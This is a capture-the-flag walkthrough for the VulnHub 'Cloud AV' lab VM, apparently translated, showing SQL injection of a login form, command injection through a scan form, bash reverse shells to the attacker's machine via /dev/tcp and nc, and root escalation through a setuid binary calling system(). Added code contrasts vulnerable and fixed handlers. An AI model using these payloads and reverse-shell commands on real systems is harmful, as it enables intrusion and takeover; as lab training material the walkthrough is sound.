Target VM: easy_cloudantivirus
Preparation
- Download the target VM: //www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
- Importing the target into VirtualBox is recommended; pay attention to these two settings:
  - Display –> Graphics Controller –> VMSVGA
  - USB Devices –> USB 1.1 (OHCI) Controller
- Configure the network environment: //www.cnblogs.com/shadow-/p/16815020.html
  - kali: NAT + [ Bridged/Host-Only ]
  - target: Host-Only
After finishing the above, take snapshots of both kali and the target to record the current environment and setup, so that a mistake during the exercise does not cause irreversible damage.
Attack walkthrough
Finding the target
This step is usually done with the scanning tools in Kali: arp-scan, nmap, Fping, Nping, Arping, Nbtscan, …
arp-scan is generally recommended because it is simple to use.
- Use sudo arp-scan -l -I eth1 to look for the target; the target is found at 192.168.56.109
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1                                                  127 ⨯
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (//github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:4d:8e:be       PCS Systemtechnik GmbH
192.168.56.109  08:00:27:17:f5:a8       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.201 seconds (116.31 hosts/sec). 3 responded
- In arp-scan, -I is short for --interface= and specifies the interface to scan; if it is omitted, eth0 is scanned by default.
- Use -l when the subnet is unknown; the subnet to scan can of course also be given directly.
- The first step should be verified: check the target's MAC address in VirtualBox against the one shown above. This also confirms that the configuration done during preparation is working.
- Port scan the target with nmap; the classic command nmap -A -T4 192.168.56.109 is enough:
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.109                                                  1 ⨯
Starting Nmap 7.93 ( //nmap.org ) at 2022-10-23 14:29 CST
Nmap scan report for 192.168.56.109
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6a424b7c2a060f504b32cfb831e9c4f4 (RSA)
|   256 81c7600fd71e56f7a31e9f7627bd3127 (ECDSA)
|_  256 7190c326ba3be8b3537e7353274d6baf (ED25519)
8080/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at //nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
- The -A option detects the operating system and service versions.
- The -T4 option speeds up the scan.
- From the scan results we learn the following:
  - The OS is Linux
  - Two ports are open: 22/tcp (ssh: OpenSSH 7.6p1 Ubuntu 4) and 8080/tcp (http: Werkzeug httpd 0.14.1)
Injection testing
We have no lead on ssh for now, so we can try the http service the target exposes.
- Visiting //192.168.56.109:8080/ in a browser shows an ordinary page; we can view its source:
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h2>This is a beta Cloud Anti-Virus Scanner service.</h2>
<h3>Please enter your invite code to start testing</h3>
<form action="/login" method="POST">
<input type="text" name="password" placeholder="Invite Code">
<input type="submit" value="Log in">
</form>
</body>
</html>
- Source analysis reveals a form submitted via POST that carries a single field named password.
- The form posts to /login, so we can reasonably infer that the submitted data is used for login.
- This is a place to try injection testing.
- To look for possible injection points in the page content, we can test with sqlmap:
  - Create a file target.txt
  - In Kali's Firefox-ESR, on the page //192.168.56.109:8080/, press Ctrl + Shift + I to open the Web Developer Tools
  - In the Network tool of the Web Developer Tools, set an intercept on the page //192.168.56.109:8080/login
  - From the page //192.168.56.109:8080/, send the POST request of the form above
  - Copy the intercepted request's headers and body into the file target.txt
  - Run sqlmap -r target.txt -f --level 4 --risk 3
┌──(kali㉿kali)-[~/workspace]
└─$ sqlmap -r testsql.txt -f --level 4 --risk 3
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   //sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:18:43 /2022-10-23/

[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'
[15:18:43] [INFO] testing connection to the target URL
[15:18:44] [INFO] testing if the target URL content is stable
[15:18:44] [INFO] target URL content is stable
[15:18:44] [INFO] testing if POST parameter 'password' is dynamic
[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'
[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y
[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable 
[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite' 
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y
[15:19:14] [INFO] testing 'Generic inline queries'
[15:19:14] [INFO] testing 'SQLite inline queries'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable 
[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- This shows that an injection point exists and that the DBMS is probably SQLite.
- The line [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable shows that the injection type is OR boolean-based.
- Build the SQL injection payload. Knowing the injection type is OR boolean-based, we can try the fairly generic payload " or 1=1-- and submit it as the password value of the form on the page //192.168.56.109:8080/.
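As an added illustration (not code from the walkthrough, and not the target's app.py, whose source is not shown here), the snippet below rebuilds the login check two ways against an in-memory SQLite table with an assumed one-column schema: the string-formatted query that the " or 1=1-- payload bypasses, and the parameterised query that treats the same input as an ordinary value.

```python
import sqlite3

# Constructed stand-in for the target's invite-code table; the real
# database.sql schema is not on the page, so this layout is an assumption.
SAMPLE_SCHEMA = "CREATE TABLE code (password TEXT)"
SAMPLE_ROWS = [("constructed-invite-code",)]
PAYLOAD = '" or 1=1--'   # the payload used in the walkthrough


def _fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SAMPLE_SCHEMA)
    conn.executemany("INSERT INTO code VALUES (?)", SAMPLE_ROWS)
    return conn


def vulnerable_login(password):
    """String-formatted query, the shape the injectable /login handler must have
    (double quotes, since the working payload opens with one)."""
    conn = _fresh_db()
    # With PAYLOAD this becomes: ... WHERE password="" or 1=1--"
    # The "or 1=1" matches every row and "--" comments out the trailing quote.
    query = 'SELECT password FROM code WHERE password="%s"' % password
    return conn.execute(query).fetchone() is not None


def safe_login(password):
    """Parameterised query: the driver binds the value separately from the SQL,
    so quotes, "or" and "--" inside it never change the statement."""
    conn = _fresh_db()
    row = conn.execute(
        "SELECT 1 FROM code WHERE password = ?", (password,)).fetchone()
    return row is not None


if __name__ == "__main__":
    print("vulnerable:", vulnerable_login(PAYLOAD))   # True: login bypassed
    print("parameterised:", safe_login(PAYLOAD))       # False: payload is just a string
```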
At this point we have successfully logged in to the //192.168.56.109:8080/scan page. A little exploration shows this page is the web application's back-end admin page.
It accepts submitted data, and the phrase Try scanning some of these files with our scanner!
tells us the submitted data is handed to some scanning program, which most likely means execution in a shell.
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h3>Try scanning some of these files with our scanner!</h3>
<pre>total 4756
-rwxr-xr-x 1 scanner scanner 1113504 Oct 21 2018 bash
-rwxr-xr-x 1 scanner scanner 34888 Oct 21 2018 bzip2
-rwxr-xr-x 1 scanner scanner 35064 Oct 21 2018 cat
-rw-rw-r-- 1 scanner scanner 68 Oct 21 2018 eicar
-rw-rw-r-- 1 scanner scanner 5 Oct 21 2018 hello
-rwxr-xr-x 1 scanner scanner 35312 Oct 21 2018 netcat
-rwxr-xr-x 1 scanner scanner 3633560 Oct 21 2018 python
</pre>
<form action="/output" method="POST">
<input type="filename" name="filename" placeholder="File Name">
<input type="submit" value="Scan!">
</form>
</body>
</html>
We can try using the | pipe to chain commands, changing the returned content and mixing in the information we want.
- Submitting a | id gives the result below, which shows the input is not filtered and we can execute commands through it: uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
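Added example, not the target's app.py: the assumed shape of the /output handler that splices the file name into a shell command line, next to an allowlisted argv builder that only accepts a real file name from the samples directory and never involves a shell. The samples directory is a constructed temp directory using the names from the listing above; clamscan is an assumed scanner name.

```python
import os
import tempfile

# Constructed stand-in for ~/cloudav_app/samples, using the names shown on the page.
SAMPLE_NAMES = ("bash", "bzip2", "cat", "eicar", "hello", "netcat", "python")


def make_sample_dir():
    d = tempfile.mkdtemp(prefix="samples-")
    for name in SAMPLE_NAMES:
        open(os.path.join(d, name), "w").close()
    return d


def vulnerable_scan_command(filename, samples_dir):
    """Assumed shape of the injectable handler: the name is spliced into one string
    that is then given to a shell, so 'a | id' turns into a second command."""
    return "clamscan %s/%s" % (samples_dir, filename)


def safe_scan_command(filename, samples_dir):
    """Allowlisted argv: only an existing plain file name from samples_dir is accepted,
    and the result is a list for subprocess.run(argv) with no shell in between,
    so '|' would only ever be a byte inside a file name."""
    if filename in (".", "..") or filename != os.path.basename(filename):
        raise ValueError("path components are not allowed: %r" % filename)
    if filename not in os.listdir(samples_dir):
        raise ValueError("not a sample file: %r" % filename)
    return ["clamscan", os.path.join(samples_dir, filename)]


def rejects(filename, samples_dir):
    """True when safe_scan_command refuses the name."""
    try:
        safe_scan_command(filename, samples_dir)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    d = make_sample_dir()
    print(vulnerable_scan_command("a | id", d))   # shell would run clamscan .../a, then id
    print(safe_scan_command("eicar", d))          # ['clamscan', '.../eicar']
    print(rejects("a | id", d), rejects("../.bashrc", d))   # True True
```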
Reverse shell
- Through this vulnerability we can build a | ls | grep 'xxxxx' | <command to run>
- We can check whether wget exists; it helps with uploading a payload and works together with metasploit.
- We can also get a reverse shell with nc by running the commands below in turn. The nc version on the target is not convenient for a direct reverse shell, so it can still be done with nc but is more cumbersome.
- Upload a bash reverse-shell script with nc:
  - Submit via the form: a | ls | grep 'xxxxx' | touch a.sh
  - Submit via the form: a | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.sh
  - On kali run: nc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1'
  - On kali run netcat -lvp 23333 to listen on the port
  - Submit via the form: a | ls | grep 'xxxxx' | bash a.sh to trigger the reverse shell
┌──(kali㉿kali)-[~/workspace]
└─$ netcat -lvp 23333
listening on [any] 23333 ...
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
scanner@cloudav:~/cloudav_app$ ls
ls
app.py  a.sh  database.sql  get-pip.py  get-pip.py.1  get-pip.py.2  get-pip.py.3  samples  templates
scanner@cloudav:~/cloudav_app$ 
- Reverse shell obtained.
- Essentially, the scanner user already has a great deal of freedom to act, and almost any approach would break in. [No other reverse-shell demonstrations are given here; look them up yourself if needed.]
Exploring the target
We are now inside the target; let's explore its directories and files.
- In the user's home directory we find a file with a special permission bit: -rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
scanner@cloudav:~$ ls -alh
ls -alh
total 60K
drwxr-xr-x 6 scanner scanner 4.0K Oct 24  2018 .
drwxr-xr-x 4 root    root    4.0K Oct 21  2018 ..
-rw------- 1 scanner scanner    5 Oct 24  2018 .bash_history
-rw-r--r-- 1 scanner scanner  220 Oct 21  2018 .bash_logout
-rw-r--r-- 1 scanner scanner 3.7K Oct 21  2018 .bashrc
drwx------ 2 scanner scanner 4.0K Oct 21  2018 .cache
drwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_app
drwx------ 3 scanner scanner 4.0K Oct 21  2018 .gnupg
drwxrwxr-x 3 scanner scanner 4.0K Oct 21  2018 .local
-rw-r--r-- 1 scanner scanner  807 Oct 21  2018 .profile
-rw-rw-r-- 1 scanner scanner   66 Oct 24  2018 .selected_editor
-rwsr-xr-x 1 root    scanner 8.4K Oct 24  2018 update_cloudav
-rw-rw-r-- 1 scanner scanner  393 Oct 24  2018 update_cloudav.c
- In Linux, the s in the permission string is the set-user-ID bit: when the program runs, the process takes on the file owner's privileges. The s bit is a sensitive permission that easily leads to security problems.
- The source update_cloudav.c is also present. Reading it shows the tool needs one argument, which it pastes unchecked into a shell command, so we can use exactly the same trick again:
#include <stdio.h>
#include <stdlib.h>   /* malloc, system  (these three headers are not in the file on the target; added so it compiles cleanly) */
#include <string.h>   /* strlen */
#include <unistd.h>   /* setgid, setuid */

int main(int argc, char *argv[]) {
    char *freshclam = "/usr/bin/freshclam";
    if (argc < 2) {
        printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
        return 1;
    }
    /* argv[1] is concatenated into a command line without any validation */
    char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
    sprintf(command, "%s %s", freshclam, argv[1]);
    setgid(0);
    setuid(0);
    /* system() runs the string through /bin/sh as root, so shell
       metacharacters such as | in argv[1] are interpreted */
    system(command);
    return 0;
}
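Added example, not from the walkthrough: a small triage script that parses an ls -l listing (the one captured above, embedded as constructed input) and reports set-user-ID and set-group-ID entries, rating a root-owned setuid binary such as update_cloudav as high risk because any group or other user who can execute it runs code as root.

```python
import re

# Constructed input: lines from the listing captured on the target above.
LISTING = """\
total 60K
drwxr-xr-x 6 scanner scanner 4.0K Oct 24  2018 .
-rw-r--r-- 1 scanner scanner  807 Oct 21  2018 .profile
drwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_app
-rwsr-xr-x 1 root    scanner 8.4K Oct 24  2018 update_cloudav
-rw-rw-r-- 1 scanner scanner  393 Oct 24  2018 update_cloudav.c
"""

# type char + 9 permission chars, link count, owner, group, size, three date tokens, name
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<name>.+)$")


def parse_ls_line(line):
    """Return a dict for one ls -l entry, or None for lines such as 'total 60K'."""
    m = LS_LINE.match(line.strip())
    if not m:
        return None
    mode = m.group("mode")           # e.g. -rwsr-xr-x: index 3 = owner x/s, 6 = group x/s
    return {
        "name": m.group("name"),
        "owner": m.group("owner"),
        "group": m.group("group"),
        "setuid": mode[3] in "sS",
        "setgid": mode[6] in "sS",
        "exec_by_others": mode[6] in "xs" or mode[9] in "xt",
    }


def find_setid_files(listing):
    """Entries whose execution changes identity; root-owned setuid that non-owners
    can execute is rated high, anything else set-ID is flagged for review."""
    findings = []
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e and (e["setuid"] or e["setgid"]):
            root_suid = e["setuid"] and e["owner"] == "root" and e["exec_by_others"]
            e["risk"] = "high" if root_suid else "review"
            findings.append(e)
    return findings


if __name__ == "__main__":
    for f in find_setid_files(LISTING):
        print(f["risk"], f["name"], "owner=%s group=%s" % (f["owner"], f["group"]))
```

The binary itself is fixed by executing /usr/bin/freshclam with an argument vector (execv) instead of calling system() on a string built from argv[1].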
Getting root
- On Kali, run netcat -lvp 4444 to listen on port 4444.
- On the target's shell, trigger the reverse shell: touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"
┌──(kali㉿kali)-[~]
└─$ netcat -lvp 4444
listening on [any] 4444 ...
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 56672
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
root@cloudav:~# id
id
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
Game over